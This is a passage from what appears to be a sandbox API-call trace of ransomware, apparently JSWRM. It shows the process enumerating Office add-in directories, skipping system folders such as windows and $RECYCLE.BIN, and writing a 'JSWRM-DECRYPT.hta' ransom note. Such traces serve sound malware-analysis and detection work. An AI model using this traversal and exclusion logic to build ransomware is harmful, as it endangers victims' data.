[0123.071] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.071] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0123.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0123.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d0d8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0123.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0123.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0123.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x23aa80 [0123.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21be68 | out: hHeap=0x1e0000) returned 1 [0123.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0123.072] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf47e9c8f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4a25fae, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x32aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.072] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.072] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.072] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.072] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.072] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.072] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.072] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.072] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.072] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.072] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0123.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0123.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0123.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0a0, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0123.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x21be68 [0123.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0123.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.072] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa2f5c0f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa2f5c0f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa2f5c0f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8baa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.073] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.073] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.073] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.073] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.073] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.073] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.073] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.073] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.073] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.073] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0123.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0123.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0123.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0123.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ede0 [0123.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21be68 | out: hHeap=0x1e0000) returned 1 [0123.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.073] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa2f5c0f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa2f5c0f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa2f5c0f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8baa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 0 [0123.073] FindClose (in: hFindFile=0x232140 | out: hFindFile=0x232140) returned 1 [0123.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0123.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0123.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b0e0 | out: hHeap=0x1e0000) returned 1 [0123.073] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0df27d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8719376, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x8719376, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="et", cAlternateFileName="")) returned 1 [0123.073] lstrcmpiW (lpString1="et", lpString2=".") returned 1 [0123.073] lstrcmpiW (lpString1="et", lpString2="..") returned 1 [0123.074] lstrcmpiW (lpString1="et", lpString2="...") returned 1 [0123.074] lstrcmpiW (lpString1="et", lpString2="windows") returned -1 [0123.074] lstrcmpiW (lpString1="et", lpString2="recovery") returned -1 [0123.074] lstrcmpiW (lpString1="et", lpString2="perflogs") returned -1 [0123.074] lstrcmpiW (lpString1="et", lpString2="documents and settings") returned 1 [0123.074] lstrcmpiW (lpString1="et", lpString2="$RECYCLE.BIN") returned 1 [0123.074] lstrcmpiW (lpString1="et", lpString2="system volume information") returned -1 [0123.074] lstrcmpiW (lpString1="et", lpString2="msocache") returned -1 [0123.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0123.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0123.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0123.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0123.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0123.074] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\et\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\et\\jswrm-decrypt.hta")) returned 0xffffffff [0123.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0123.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24f1e0 [0123.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0123.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x250fb0 [0123.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b650 [0123.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b650 | out: hHeap=0x1e0000) returned 1 [0123.075] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\et\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\et\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.076] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.076] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.077] CloseHandle (hObject=0x338) returned 1 [0123.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x250fb0 | out: hHeap=0x1e0000) returned 1 [0123.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0123.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b650 [0123.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0123.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0123.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0123.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0123.077] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\et\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\et\\jswrm-decrypt.hta")) returned 0x20 [0123.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0123.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0123.077] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\et\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0df27d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8719376, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4004339f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x231ec0 [0123.077] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.077] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0df27d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8719376, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4004339f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.077] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.077] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.077] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4004339f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4004339f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4004339f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.078] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.078] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.078] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.078] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.078] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.078] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.078] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.078] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.078] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.078] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0123.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0123.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0123.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0123.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0123.078] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x381f2dc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x381f2dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x381f2dc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdaa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.078] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.078] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.078] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.078] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.078] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.078] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.078] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.078] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.078] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.079] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0123.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0123.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0123.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0123.079] RtlAllocateHeap 